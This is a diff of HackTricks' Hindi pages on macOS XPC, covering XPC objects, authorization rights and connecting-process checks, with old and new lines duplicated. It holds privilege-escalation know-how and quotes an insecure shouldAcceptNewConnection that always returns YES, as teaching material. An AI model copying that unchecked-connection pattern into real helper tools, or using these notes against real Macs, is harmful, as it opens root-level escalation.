- Mach पोर्ट या फाइल डिस्क्रिप्टर्स का स्थानांतरण करते समय, उचित प्रोटोकॉल का पालन करें और रिसोर्सेस को जिम्मेदारी से संभालें ताकि लीक या अनपेक्षित पहुंच से बचा जा सके।
- Mach पोर्ट या फाइल डिस्क्रिप्टर्स को स्थानांतरित करते समय, उचित प्रोटोकॉल का पालन करें और रिसोर्सेस को जिम्मेदारी से संभालें ताकि लीक या अनपेक्षित पहुंच से बचा जा सके।
इन दिशानिर्देशों का पालन करके और `threadexec` पुस्तकालय का उपयोग करके, कोई भी प्रक्रियाओं का कुशलतापूर्वक प्रबंधन और बातचीत कर सकता है, लक्षित प्रक्रिया पर पूर्ण नियंत्रण प्राप्त कर सकता है।

28
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/README.md
View File

@ -20,9 +20,9 @@ XPC के प्राथमिक लाभों में शामिल
एक एप्लिकेशन के XPC घटक **एप्लिकेशन के अंदर ही होते हैं।** उदाहरण के लिए, Safari में आप इन्हें **`/Applications/Safari.app/Contents/XPCServices`** में पा सकते हैं। इनके पास **`.xpc`** एक्सटेंशन होता है (जैसे **`com.apple.Safari.SandboxBroker.xpc`**) और ये मुख्य बाइनरी के साथ **बंडल** होते हैं: `/Applications/Safari.app/Contents/XPCServices/com.apple.Safari.SandboxBroker.xpc/Contents/MacOS/com.apple.Safari.SandboxBroker` और एक `Info.plist: /Applications/Safari.app/Contents/XPCServices/com.apple.Safari.SandboxBroker.xpc/Contents/Info.plist`
जैसा कि आप सोच रहे होंगे, एक **XPC घटक के पास अन्य XPC घटकों या मुख्य ऐप बाइनरी की तुलना में विभिन्न अधिकार और विशेषताएँ होंगी।** सिवाय इसके कि यदि एक XPC सेवा को [**JoinExistingSession**](https://developer.apple.com/documentation/bundleresources/information_property_list/xpcservice/joinexistingsession) इसके **Info.plist** फ़ाइल में “True” पर सेट किया गया है। इस मामले में, XPC सेवा उस **सुरक्षा सत्र में चलेगी** जो उसे कॉल करने वाले एप्लिकेशन के समान है
जैसा कि आप सोच रहे होंगे, एक **XPC घटक के पास अन्य XPC घटकों या मुख्य ऐप बाइनरी की तुलना में विभिन्न अधिकार और विशेषताएँ होंगी।** सिवाय इसके कि यदि एक XPC सेवा को [**JoinExistingSession**](https://developer.apple.com/documentation/bundleresources/information_property_list/xpcservice/joinexistingsession) इसके **Info.plist** फ़ाइल में “True” पर सेट किया गया है। इस मामले में, XPC सेवा उस **सुरक्षा सत्र में चलेगी** जो एप्लिकेशन ने इसे कॉल किया
XPC सेवाएँ **launchd** द्वारा आवश्यकतानुसार **शुरू** की जाती हैं और सभी कार्यों के **पूर्ण** होने पर सिस्टम संसाधनों को मुक्त करने के लिए **बंद** कर दी जाती हैं। **एप्लिकेशन-विशिष्ट XPC घटक केवल एप्लिकेशन द्वारा ही उपयोग किए जा सकते हैं**, इस प्रकार संभावित कमजोरियों से जुड़े जोखिम को कम करते हैं।
XPC सेवाएँ **launchd** द्वारा आवश्यकतानुसार **शुरू** की जाती हैं और सभी कार्यों के **पूर्ण** होने पर सिस्टम संसाधनों को मुक्त करने के लिए **बंद** कर दी जाती हैं। **एप्लिकेशन-विशिष्ट XPC घटक केवल एप्लिकेशन द्वारा उपयोग किए जा सकते हैं**, इस प्रकार संभावित कमजोरियों से जुड़े जोखिम को कम करते हैं।
## System Wide XPC services
@ -62,18 +62,18 @@ cat /Library/LaunchDaemons/com.jamf.management.daemon.plist
</dict>
</plist>
```
**`LaunchDameons`** में चलने वाले प्रक्रियाएँ root द्वारा चलाए जाते हैं। इसलिए यदि एक अप्रिविलेज्ड प्रक्रिया इनमें से किसी के साथ बात कर सकती है, तो यह विशेषाधिकार बढ़ाने में सक्षम हो सकती है।
**`LaunchDameons`** में चलने वाले प्रक्रियाएँ रूट द्वारा चलाए जाते हैं। इसलिए यदि एक अप्रिविलेज्ड प्रक्रिया इनमें से किसी के साथ बात कर सकती है, तो यह विशेषाधिकार बढ़ाने में सक्षम हो सकती है।
## XPC ऑब्जेक्ट्स
- **`xpc_object_t`**
हर XPC संदेश एक शब्दकोश ऑब्जेक्ट है जो अनुक्रमण और अव्यवस्थित करने को सरल बनाता है। इसके अलावा, `libxpc.dylib` अधिकांश डेटा प्रकारों की घोषणा करता है, इसलिए यह संभव है कि प्राप्त डेटा अपेक्षित प्रकार का हो। C API में हर ऑब्जेक्ट एक `xpc_object_t` है (और इसके प्रकार की जांच `xpc_get_type(object)` का उपयोग करके की जा सकती है)।\
हर XPC संदेश एक डिक्शनरी ऑब्जेक्ट है जो सीरियलाइजेशन और डीसिरियलाइजेशन को सरल बनाता है। इसके अलावा, `libxpc.dylib` अधिकांश डेटा प्रकारों की घोषणा करता है, इसलिए यह संभव है कि प्राप्त डेटा अपेक्षित प्रकार का हो। C API में हर ऑब्जेक्ट एक `xpc_object_t` है (और इसके प्रकार की जांच `xpc_get_type(object)` का उपयोग करके की जा सकती है)।\
इसके अलावा, फ़ंक्शन `xpc_copy_description(object)` का उपयोग ऑब्जेक्ट का स्ट्रिंग प्रतिनिधित्व प्राप्त करने के लिए किया जा सकता है, जो डिबगिंग उद्देश्यों के लिए उपयोगी हो सकता है।\
इन ऑब्जेक्ट्स में कुछ विधियाँ भी होती हैं जैसे `xpc_<object>_copy`, `xpc_<object>_equal`, `xpc_<object>_hash`, `xpc_<object>_serialize`, `xpc_<object>_deserialize`...
इन ऑब्जेक्ट्स में कुछ विधियाँ भी होती हैं जिन्हें कॉल किया जा सकता है जैसे `xpc_<object>_copy`, `xpc_<object>_equal`, `xpc_<object>_hash`, `xpc_<object>_serialize`, `xpc_<object>_deserialize`...
`xpc_object_t` को `xpc_<objetType>_create` फ़ंक्शन को कॉल करके बनाया जाता है, जो आंतरिक रूप से `_xpc_base_create(Class, Size)` को कॉल करता है जहाँ ऑब्जेक्ट की कक्षा का प्रकार (एक `XPC_TYPE_*` में से) और इसका आकार (मेटाडेटा के लिए कुछ अतिरिक्त 40B आकार में जोड़ा जाएगा) निर्दिष्ट किया जाता है। इसका मतलब है कि ऑब्जेक्ट का डेटा 40B के ऑफसेट से शुरू होगा।\
इसलिए, `xpc_<objectType>_t` एक प्रकार का `xpc_object_t` का उपवर्ग है जो `os_object_t*` का उपवर्ग होगा।
`xpc_object_t` को `xpc_<objetType>_create` फ़ंक्शन को कॉल करके बनाया जाता है, जो आंतरिक रूप से `_xpc_base_create(Class, Size)` को कॉल करता है जहाँ ऑब्जेक्ट की क्लास का प्रकार (एक `XPC_TYPE_*` में से) और इसका आकार (मेटाडेटा के लिए कुछ अतिरिक्त 40B आकार में जोड़ा जाएगा) निर्दिष्ट किया जाता है। जिसका अर्थ है कि ऑब्जेक्ट का डेटा 40B के ऑफसेट से शुरू होगा।\
इसलिए, `xpc_<objectType>_t` एक प्रकार का उपवर्ग है `xpc_object_t` का, जो `os_object_t*` का उपवर्ग होगा।
> [!WARNING]
> ध्यान दें कि यह डेवलपर होना चाहिए जो `xpc_dictionary_[get/set]_<objectType>` का उपयोग करके एक कुंजी के प्रकार और वास्तविक मान को प्राप्त या सेट करता है।
@ -83,7 +83,7 @@ cat /Library/LaunchDaemons/com.jamf.management.daemon.plist
एक **`xpc_pipe`** एक FIFO पाइप है जिसका उपयोग प्रक्रियाएँ संवाद करने के लिए कर सकती हैं (संवाद में Mach संदेशों का उपयोग होता है)।\
एक XPC सर्वर बनाने के लिए `xpc_pipe_create()` या `xpc_pipe_create_from_port()` को कॉल करके इसे एक विशिष्ट Mach पोर्ट का उपयोग करके बनाया जा सकता है। फिर, संदेश प्राप्त करने के लिए `xpc_pipe_receive` और `xpc_pipe_try_receive` को कॉल किया जा सकता है।
ध्यान दें कि **`xpc_pipe`** ऑब्जेक्ट एक **`xpc_object_t`** है जिसमें इसके संरचना में उपयोग किए गए दो Mach पोर्ट और नाम (यदि कोई हो) के बारे में जानकारी होती है। नाम, उदाहरण के लिए, डेमन `secinitd` अपने plist `/System/Library/LaunchDaemons/com.apple.secinitd.plist` में पाइप को `com.apple.secinitd` के रूप में कॉन्फ़िगर करता है।
ध्यान दें कि **`xpc_pipe`** ऑब्जेक्ट एक **`xpc_object_t`** है जिसमें इसके स्ट्रक्चर में उपयोग किए गए दो Mach पोर्ट और नाम (यदि कोई हो) क जानकारी होती है। नाम, उदाहरण के लिए, डेमन `secinitd` अपने plist `/System/Library/LaunchDaemons/com.apple.secinitd.plist` में पाइप को `com.apple.secinitd` के रूप में कॉन्फ़िगर करता है।
एक **`xpc_pipe`** का उदाहरण **bootstrap pip**e है जो **`launchd`** द्वारा बनाया गया है जिससे Mach पोर्ट साझा करना संभव हो जाता है।
@ -103,7 +103,7 @@ XPC संदेशों को पास करने के लिए GCD क
### सेवा शुरू करना
ऐप **`xpc_connection_create_mach_service`** का उपयोग करके XPC सेवा से **कनेक्ट** करने का प्रयास करता है, फिर launchd डेमन को ढूंढता है और **`xpcproxy`** शुरू करता है। **`xpcproxy`** कॉन्फ़िगर की गई प्रतिबंधों को लागू करता है और प्रदान किए गए FDs और Mach पोर्ट के साथ सेवा को उत्पन्न करता है।
ऐप **`xpc_connection_create_mach_service`** का उपयोग करके XPC सेवा से **कनेक्ट** करने का प्रयास करता है, फिर launchd डेमन को ढूंढता है और **`xpcproxy`** शुरू करता है। **`xpcproxy`** कॉन्फ़िगर की गई प्रतिबंधों को लागू करता है और प्रदान किए गए FDs और Mach पोर्ट के साथ सेवा को स्पॉन करता है।
XPC सेवा की खोज की गति को सुधारने के लिए, एक कैश का उपयोग किया जाता है।
@ -112,11 +112,11 @@ XPC सेवा की खोज की गति को सुधारने
supraudit S -C -o /tmp/output /dev/auditpipe
```
XPC लाइब्रेरी `kdebug` का उपयोग करती है ताकि क्रियाओं को लॉग किया जा सके जो `xpc_ktrace_pid0` और `xpc_ktrace_pid1` को कॉल करती हैं। जो कोड इसका उपयोग करते हैं वे दस्तावेजित नहीं हैं, इसलिए इन्हें `/usr/share/misc/trace.codes` में जोड़ना आवश्यक है। इनके पास `0x29` उपसर्ग है और उदाहरण के लिए एक है `0x29000004`: `XPC_serializer_pack`।\
उपकरण `xpcproxy` उपसर्ग `0x22` का उपयोग करता है, उदाहरण के लिए: `0x2200001c: xpcproxy:will_do_preexec`
यूटिलिटी `xpcproxy` उपसर्ग `0x22` का उपयोग करती है, उदाहरण के लिए: `0x2200001c: xpcproxy:will_do_preexec`
## XPC इवेंट संदेश
ऐप्लिकेशन विभिन्न इवेंट **संदेशों** के लिए **सदस्यता** ले सकते हैं, जिससे उन्हें ऐसे इवेंट होने पर **डिमांड पर शुरू** किया जा सके। इन सेवाओं के लिए **सेटअप** `launchd plist फाइलों` में किया जाता है, जो **पिछले वाले** के समान निर्देशिकाओं में स्थित होती हैं और एक अतिरिक्त **`LaunchEvent`** कुंजी होती है।
ऐप्लिकेशन विभिन्न इवेंट **संदेशों** के लिए **सदस्यता** ले सकते हैं, जिससे उन्हें ऐसे इवेंट होने पर **डिमांड पर शुरू** किया जा सके। इन सेवाओं के लिए **सेटअप** `launchd plist फाइलों` में किया जाता है, जो **पिछले वाले निर्देशिकाओं में** स्थित होती हैं और एक अतिरिक्त **`LaunchEvent`** कुंजी होती है।
### XPC कनेक्टिंग प्रक्रिया जांच
@ -440,13 +440,13 @@ return;
## Remote XPC
यह कार्यक्षमता `RemoteXPC.framework` (जो `libxpc` से है) विभिन्न होस्टों के माध्यम से XPC के माध्यम से संवाद करने की अनुमति देती है।\
जो सेवाएँ दूरस्थ XPC का समर्थन करती हैं, उनके plist में UsesRemoteXPC कुंजी होगी जैसे कि `/System/Library/LaunchDaemons/com.apple.SubmitDiagInfo.plist` के मामले में है। हालाँकि, सेवा `launchd` के साथ पंजीकृत होगी, यह `UserEventAgent` है जिसमें `com.apple.remoted.plugin` और `com.apple.remoteservicediscovery.events.plugin` प्लगइन्स हैं जो कार्यक्षमता प्रदान करते हैं।
जो सेवाएँ दूरस्थ XPC का समर्थन करती हैं, उनके plist में UsesRemoteXPC कुंजी होगी जैसे कि `/System/Library/LaunchDaemons/com.apple.SubmitDiagInfo.plist` के मामले में है। हालाँकि, सेवा `launchd` के साथ पंजीकृत होगी, यह `UserEventAgent` है जिसमें प्लगइन्स `com.apple.remoted.plugin` और `com.apple.remoteservicediscovery.events.plugin` कार्यक्षमता प्रदान करते हैं।
इसके अलावा, `RemoteServiceDiscovery.framework` `com.apple.remoted.plugin` से जानकारी प्राप्त करने की अनुमति देता है जो `get_device`, `get_unique_device`, `connect` जैसी कार्यक्षमताएँ उजागर करता है...
एक बार जब कनेक्ट का उपयोग किया जाता है और सेवा का सॉकेट `fd` एकत्र किया जाता है, तो `remote_xpc_connection_*` वर्ग का उपयोग करना संभव है।
यह संभव है कि CLI टूल `/usr/libexec/remotectl` का उपयोग करके दूरस्थ सेवाओं के बारे में जानकारी प्राप्त की जाए, जैसे कि:
यह CLI टूल `/usr/libexec/remotectl` का उपयोग करके दूरस्थ सेवाओं के बारे में जानकारी प्राप्त करना संभव है, जिसमें निम्नलिखित पैरामीटर हैं:
```bash
/usr/libexec/remotectl list # Get bridge devices
/usr/libexec/remotectl show ...# Get device properties and services
@ -455,6 +455,6 @@ return;
...
```
BridgeOS और होस्ट के बीच संचार एक समर्पित IPv6 इंटरफेस के माध्यम से होता है। `MultiverseSupport.framework` सॉकेट स्थापित करने की अनुमति देता है जिनका `fd` संचार के लिए उपयोग किया जाएगा।\
इन संचारों को `netstat`, `nettop` या ओपन सोर्स विकल्प `netbottom` का उपयोग करके पाया जा सकता है।
इन संचारों को `netstat`, `nettop` या ओपन सोर्स विकल्प, `netbottom` का उपयोग करके पाया जा सकता है।
{{#include ../../../../../banners/hacktricks-training.md}}

26
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-authorization.md
View File

@ -4,13 +4,13 @@
## XPC Authorization
Apple एक और तरीका प्रस्तावित करता है जिससे यह प्रमाणित किया जा सके कि क्या कनेक्टिंग प्रक्रिया के पास **एक एक्सपोज़्ड XPC मेथड को कॉल करने की अनुमति है**
Apple एक और तरीका प्रस्तावित करता है यह सत्यापित करने के लिए कि क्या कनेक्टिंग प्रक्रिया के पास **एक एक्सपोज़्ड XPC मेथड को कॉल करने की अनुमति है**
जब एक एप्लिकेशन को **एक विशेषाधिकार प्राप्त उपयोगकर्ता के रूप में क्रियाएँ निष्पादित करने की आवश्यकता होती है**, तो यह आमतौर पर विशेषाधिकार प्राप्त उपयोगकर्ता के रूप में एप्लिकेशन चलाने के बजाय एक HelperTool को XPC सेवा के रूप में रूट के रूप में स्थापित करता है जिसे एप्लिकेशन से उन क्रियाओं को करने के लिए कॉल किया जा सकता है। हालाँकि, सेवा को कॉल करने वाले एप्लिकेशन के पास पर्याप्त प्राधिकरण होना चाहिए।
जब एक एप्लिकेशन को **एक विशेषाधिकार प्राप्त उपयोगकर्ता के रूप में क्रियाएँ निष्पादित करने की आवश्यकता होती है**, तो यह आमतौर पर विशेषाधिकार प्राप्त उपयोगकर्ता के रूप में एप्लिकेशन चलाने के बजाय एक HelperTool को रूट के रूप में एक XPC सेवा के रूप में स्थापित करता है जिसे एप्लिकेशन से उन क्रियाओं को करने के लिए कॉल किया जा सकता है। हालाँकि, सेवा को कॉल करने वाले एप्लिकेशन के पास पर्याप्त प्राधिकरण होना चाहिए।
### ShouldAcceptNewConnection हमेशा YES
एक उदाहरण [EvenBetterAuthorizationSample](https://github.com/brenwell/EvenBetterAuthorizationSample) में पाया जा सकता है। `App/AppDelegate.m` में यह **कनेक्ट** करने की कोशिश करता है **HelperTool** से। और `HelperTool/HelperTool.m` में फ़ंक्शन **`shouldAcceptNewConnection`** **किसी भी आवश्यकताओं की जांच नहीं करेगा** जो पहले बताई गई थीं। यह हमेशा YES लौटाएगा:
एक उदाहरण [EvenBetterAuthorizationSample](https://github.com/brenwell/EvenBetterAuthorizationSample) में पाया जा सकता है। `App/AppDelegate.m` में यह **HelperTool** से **कनेक्ट** करने की कोशिश करता है। और `HelperTool/HelperTool.m` में फ़ंक्शन **`shouldAcceptNewConnection`** **कोई भी** पूर्व में निर्दिष्ट आवश्यकताओं की जांच **नहीं करेगा**। यह हमेशा YES लौटाएगा:
```objectivec
- (BOOL)listener:(NSXPCListener *)listener shouldAcceptNewConnection:(NSXPCConnection *)newConnection
// Called by our XPC listener when a new connection comes in. We configure the connection
@ -27,7 +27,7 @@ newConnection.exportedObject = self;
return YES;
}
```
अधिक जानकारी के लिए कि इसे सही तरीके से कैसे कॉन्फ़िगर किया जाए, देखें:
अधिक जानकारी के लिए कि इस जांच को सही तरीके से कैसे कॉन्फ़िगर करें:
{{#ref}}
macos-xpc-connecting-process-check/
@ -35,7 +35,7 @@ macos-xpc-connecting-process-check/
### एप्लिकेशन अधिकार
हालांकि, जब **HelperTool से एक विधि को कॉल किया जाता है, तो कुछ **अधिकार** हो रहे हैं**
हालांकि, जब HelperTool से एक विधि को कॉल किया जाता है, तो कुछ **अधिकार प्राप्त हो रहे हैं**
`App/AppDelegate.m` से **`applicationDidFinishLaunching`** फ़ंक्शन ऐप के शुरू होने के बाद एक खाली अधिकार संदर्भ बनाएगा। यह हमेशा काम करना चाहिए।\
फिर, यह उस अधिकार संदर्भ में **कुछ अधिकार जोड़ने** की कोशिश करेगा `setupAuthorizationRights` को कॉल करके:
@ -172,15 +172,15 @@ block(authRightName, authRightDefault, authRightDesc);
}];
}
```
इसका मतलब है कि इस प्रक्रिया के अंत में, `commandInfo` के अंदर घोषित अनुमतियाँ `/var/db/auth.db` में संग्रहीत की जाएँगी। ध्यान दें कि वहाँ आप **प्रत्येक विधि** के लिए पा सकते हैं जो **प्रमाणीकरण** की आवश्यकता होगी, **अनुमति नाम** और **`kCommandKeyAuthRightDefault`**। बाद वाला **यह संकेत करता है कि कौन इस अधिकार को प्राप्त कर सकता है**।
इसका मतलब है कि इस प्रक्रिया के अंत में, `commandInfo` के अंदर घोषित अनुमतियाँ `/var/db/auth.db` में संग्रहीत की जाएँगी। ध्यान दें कि वहाँ आप **प्रत्येक विधि** के लिए पा सकते हैं जो **प्रमाणीकरण** की आवश्यकता होगी, **अनुमति नाम** और **`kCommandKeyAuthRightDefault`**। बाद वाला **यह संकेत करता है कि इसे कौन प्राप्त कर सकता है**।
क अधिकार तक पहुँचने के लिए विभिन्न दायरे हैं। इनमें से कुछ [AuthorizationDB.h](https://github.com/aosm/Security/blob/master/Security/libsecurity_authorization/lib/AuthorizationDB.h) में परिभाषित है (आप [यहाँ सभी पा सकते हैं](https://www.dssw.co.uk/reference/authorization-rights/)), लेकिन संक्षेप में:
िसी अधिकार तक पहुँचने के लिए विभिन्न दायरे हैं। इनमें से कुछ को [AuthorizationDB.h](https://github.com/aosm/Security/blob/master/Security/libsecurity_authorization/lib/AuthorizationDB.h) में परिभाषित किया गया है (आप [यहाँ सभी पा सकते हैं](https://www.dssw.co.uk/reference/authorization-rights/)), लेकिन संक्षेप में:
<table><thead><tr><th width="284.3333333333333">नाम</th><th width="165">मान</th><th>विवरण</th></tr></thead><tbody><tr><td>kAuthorizationRuleClassAllow</td><td>allow</td><td>कोई भी</td></tr><tr><td>kAuthorizationRuleClassDeny</td><td>deny</td><td>कोई नहीं</td></tr><tr><td>kAuthorizationRuleIsAdmin</td><td>is-admin</td><td>वर्तमान उपयोगकर्ता को एक व्यवस्थापक होना चाहिए (व्यवस्थापक समूह के अंदर)</td></tr><tr><td>kAuthorizationRuleAuthenticateAsSessionUser</td><td>authenticate-session-owner</td><td>उपयोगकर्ता से प्रमाणीकरण करने के लिए कहें।</td></tr><tr><td>kAuthorizationRuleAuthenticateAsAdmin</td><td>authenticate-admin</td><td>उपयोगकर्ता से प्रमाणीकरण करने के लिए कहें। उसे एक व्यवस्थापक होना चाहिए (व्यवस्थापक समूह के अंदर)</td></tr><tr><td>kAuthorizationRightRule</td><td>rule</td><td>नियम निर्दिष्ट करें</td></tr><tr><td>kAuthorizationComment</td><td>comment</td><td>अधिकार पर कुछ अतिरिक्त टिप्पणियाँ निर्दिष्ट करें</td></tr></tbody></table>
### अधिकारों की सत्यापन
`HelperTool/HelperTool.m` में फ़ंक्शन **`readLicenseKeyAuthorization`** यह जांचता है कि क्या कॉलर को **ऐसी विधि** को **निष्पादित करने** के लिए अधिकृत किया गया है, फ़ंक्शन **`checkAuthorization`** को कॉल करके। यह फ़ंक्शन यह जांचेगा कि कॉलिंग प्रक्रिया द्वारा भेजा गया **authData** **सही प्रारूप** में है और फिर यह जांचेगा कि विशेष विधि को कॉल करने के लिए **क्या आवश्यक है**। यदि सब कुछ ठीक है तो **वापस किया गया `error` `nil` होगा**:
`HelperTool/HelperTool.m` में फ़ंक्शन **`readLicenseKeyAuthorization`** यह जांचता है कि क्या कॉलर को **ऐसी विधि** को **निष्पादित** करने के लिए अधिकृत किया गया है, फ़ंक्शन **`checkAuthorization`** को कॉल करके। यह फ़ंक्शन यह जांचेगा कि कॉलिंग प्रक्रिया द्वारा भेजा गया **authData** **सही प्रारूप** में है और फिर यह जांचेगा कि विशेष विधि को कॉल करने के लिए **क्या आवश्यक है**। यदि सब कुछ ठीक है तो **वापस किया गया `error` `nil` होगा**:
```objectivec
- (NSError *)checkAuthorization:(NSData *)authData command:(SEL)command
{
@ -246,17 +246,17 @@ security authorizationdb read com.apple.safaridriver.allow
```
### Permissive rights
आप **सभी अनुमति कॉन्फ़िगरेशन** [**यहां**](https://www.dssw.co.uk/reference/authorization-rights/) पा सकते हैं, लेकिन संयोजन जो उपयोगकर्ता इंटरैक्शन की आवश्यकता नहीं होगी वे हैं:
आप **सभी अनुमतियों की कॉन्फ़िगरेशन** [**यहां**](https://www.dssw.co.uk/reference/authorization-rights/) पा सकते हैं, लेकिन संयोजन जो उपयोगकर्ता इंटरैक्शन की आवश्यकता नहीं होगी, वे होंगे:
1. **'authenticate-user': 'false'**
- यह सबसे सीधा कुंजी है। यदि इसे `false` पर सेट किया गया है, तो यह निर्दिष्ट करता है कि उपयोगकर्ता को इस अधिकार को प्राप्त करने के लिए प्रमाणीकरण प्रदान करने की आवश्यकता नहीं है।
- इसका उपयोग **नीचे दिए गए 2 में से एक के साथ या उपयोगकर्ता को संबंधित समूह को इंगित करने के लिए** किया जाता है।
2. **'allow-root': 'true'**
- यदि एक उपयोगकर्ता रूट उपयोगकर्ता के रूप में कार्य कर रहा है (जिसके पास उच्च अनुमति है), और यह कुंजी `true` पर सेट है, तो रूट उपयोगकर्ता संभावित रूप से बिना किसी अतिरिक्त प्रमाणीकरण के इस अधिकार को प्राप्त कर सकता है। हालाँकि, आमतौर पर, रूट उपयोगकर्ता स्थिति प्राप्त करने के लिए पहले से ही प्रमाणीकरण की आवश्यकता होती है, इसलिए यह अधिकांश उपयोगकर्ताओं के लिए "कोई प्रमाणीकरण नहीं" परिदृश्य नहीं है।
- यदि एक उपयोगकर्ता रूट उपयोगकर्ता के रूप में कार्य कर रहा है (जिसके पास उच्च अनुमतियाँ है), और यह कुंजी `true` पर सेट है, तो रूट उपयोगकर्ता संभावित रूप से बिना किसी अतिरिक्त प्रमाणीकरण के इस अधिकार को प्राप्त कर सकता है। हालाँकि, आमतौर पर, रूट उपयोगकर्ता स्थिति प्राप्त करने के लिए पहले से ही प्रमाणीकरण की आवश्यकता होती है, इसलिए यह अधिकांश उपयोगकर्ताओं के लिए "कोई प्रमाणीकरण नहीं" परिदृश्य नहीं है।
3. **'session-owner': 'true'**
- यदि इसे `true` पर सेट किया गया है, तो सत्र का मालिक (वर्तमान में लॉग इन किया हुआ उपयोगकर्ता) स्वचालित रूप से इस अधिकार को प्राप्त करेगा। यदि उपयोगकर्ता पहले से ही लॉग इन है तो यह अतिरिक्त प्रमाणीकरण को बायपास कर सकता है।
- यदि इसे `true` पर सेट किया गया है, तो सत्र का मालिक (वर्तमान में लॉग इन किया हुआ उपयोगकर्ता) स्वचालित रूप से इस अधिकार को प्राप्त करेगा। यदि उपयोगकर्ता पहले से ही लॉग इन है, तो यह अतिरिक्त प्रमाणीकरण को बायपास कर सकता है।
4. **'shared': 'true'**
- यह कुंजी प्रमाणीकरण के बिना अधिकार नहीं देती है। इसके बजाय, यदि इसे `true` पर सेट किया गया है, तो इसका मतलब है कि एक बार जब अधिकार को प्रमाणीकरण किया गया है, तो इसे कई प्रक्रियाओं के बीच साझा किया जा सकता है बिना प्रत्येक को फिर से प्रमाणीकरण की आवश्यकता के। लेकिन अधिकार का प्रारंभिक अनुदान अभी भी प्रमाणीकरण की आवश्यकता होगी जब तक कि इसे अन्य कुंजियों जैसे कि `'authenticate-user': 'false'` के साथ संयोजित नहीं किया गया ह
- यह कुंजी प्रमाणीकरण के बिना अधिकार नहीं देती है। इसके बजाय, यदि इसे `true` पर सेट किया गया है, तो इसका मतलब है कि एक बार जब अधिकार को प्रमाणीकरण किया गया है, तो इसे कई प्रक्रियाओं के बीच साझा किया जा सकता है बिना प्रत्येक को फिर से प्रमाणीकरण की आवश्यकता के। लेकिन अधिकार का प्रारंभिक अनुदान अभी भी प्रमाणीकरण की आवश्यकता होगी जब तक कि इसे अन्य कुंजियों जैसे कि `'authenticate-user': 'false'` के साथ संयोजित नहीं किया गया ह
आप [**इस स्क्रिप्ट का उपयोग कर सकते हैं**](https://gist.github.com/carlospolop/96ecb9e385a4667b9e40b24e878652f9) दिलचस्प अधिकार प्राप्त करने के लिए:
```bash
@ -273,7 +273,7 @@ authenticate-session-owner, authenticate-session-owner-or-admin, authenticate-se
### यह जांचना कि क्या EvenBetterAuthorization का उपयोग किया गया है
यदि आप फ़ंक्शन पाते हैं: **`[HelperTool checkAuthorization:command:]`** तो यह संभवतः प्रक्रिया द्वारा पहले उल्लेखित स्कीमा का उपयोग कर रही है:
यदि आप फ़ंक्शन: **`[HelperTool checkAuthorization:command:]`** पाते हैं, तो यह संभवतः प्रक्रिया द्वारा पहले उल्लेखित स्कीमा का उपयोग कर रही है:
<figure><img src="../../../../../images/image (42).png" alt=""><figcaption></figcaption></figure>

10
src/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-ipc-inter-process-communication/macos-xpc/macos-xpc-connecting-process-check/README.md
View File

@ -4,16 +4,16 @@
## XPC कनेक्टिंग प्रोसेस चेक
जब एक XPC सेवा से कनेक्शन स्थापित किया जाता है, तो सर्वर यह जांच करेगा कि कनेक्शन की अनुमति है या नहीं। ये सामान्यतः की जाने वाली जांचें हैं:
जब एक XPC सेवा से कनेक्शन स्थापित किया जाता है, तो सर्वर यह जांच करेगा कि कनेक्शन की अनुमति है या नहीं। ये सामान्यतः किए जाने वाले चेक हैं:
1. जांचें कि कनेक्टिंग **प्रोसेस एक Apple-साइन किए गए** प्रमाणपत्र के साथ साइन किया गया है (जो केवल Apple द्वारा दिया जाता है)।
- यदि यह **सत्यापित नहीं है**, तो एक हमलावर एक **नकली प्रमाणपत्र** बना सकता है जो किसी अन्य जांच से मेल खाता हो।
- यदि यह **सत्यापित नहीं है**, तो एक हमलावर एक **नकली प्रमाणपत्र** बना सकता है जो किसी अन्य चेक से मेल खाता हो।
2. जांचें कि कनेक्टिंग प्रोसेस **संस्थान के प्रमाणपत्र** के साथ साइन किया गया है (टीम आईडी सत्यापन)।
- यदि यह **सत्यापित नहीं है**, तो Apple से **कोई भी डेवलपर प्रमाणपत्र** साइनिंग के लिए उपयोग किया जा सकता है, और सेवा से कनेक्ट किया जा सकता है।
3. जांचें कि कनेक्टिंग प्रोसेस **एक उचित बंडल आईडी** रखता है।
- यदि यह **सत्यापित नहीं है**, तो उसी संगठन द्वारा **साइन किए गए किसी भी टूल** का उपयोग XPC सेवा के साथ इंटरैक्ट करने के लिए किया जा सकता है।
4. (4 या 5) जांचें कि कनेक्टिंग प्रोसेस में **एक उचित सॉफ़्टवेयर संस्करण संख्या** है।
- यदि यह **सत्यापित नहीं है**, तो एक पुराना, असुरक्षित क्लाइंट, जो प्रोसेस इंजेक्शन के प्रति संवेदनशील है, XPC सेवा से कनेक्ट करने के लिए उपयोग किया जा सकता है, भले ही अन्य जांचें लागू हों।
- यदि यह **सत्यापित नहीं है**, तो एक पुराना, असुरक्षित क्लाइंट, जो प्रोसेस इंजेक्शन के प्रति संवेदनशील है, XPC सेवा से कनेक्ट करने के लिए उपयोग किया जा सकता है, भले ही अन्य चेक लागू हों।
5. (4 या 5) जांचें कि कनेक्टिंग प्रोसेस में खतरनाक अधिकारों के बिना **हर्डनड रनटाइम** है (जैसे कि वे जो मनमाने लाइब्रेरी लोड करने या DYLD env vars का उपयोग करने की अनुमति देते हैं)।
1. यदि यह **सत्यापित नहीं है**, तो क्लाइंट **कोड इंजेक्शन के प्रति संवेदनशील** हो सकता है।
6. जांचें कि कनेक्टिंग प्रोसेस में एक **अधिकार** है जो इसे सेवा से कनेक्ट करने की अनुमति देता है। यह Apple बाइनरी के लिए लागू है।
@ -36,9 +36,9 @@ macos-pid-reuse.md
macos-xpc_connection_get_audit_token-attack.md
{{#endref}}
### Trustcache - डाउनग्रेड हमलों की रोकथाम
### ट्रस्टकैश - डाउनग्रेड हमलों की रोकथाम
Trustcache एक रक्षात्मक विधि है जो Apple Silicon मशीनों में पेश की गई है जो Apple बाइनरी के CDHSAH का एक डेटाबेस संग्रहीत करती है ताकि केवल अनुमत गैर-संशोधित बाइनरी को निष्पादित किया जा सके। जो डाउनग्रेड संस्करणों के निष्पादन को रोकता है।
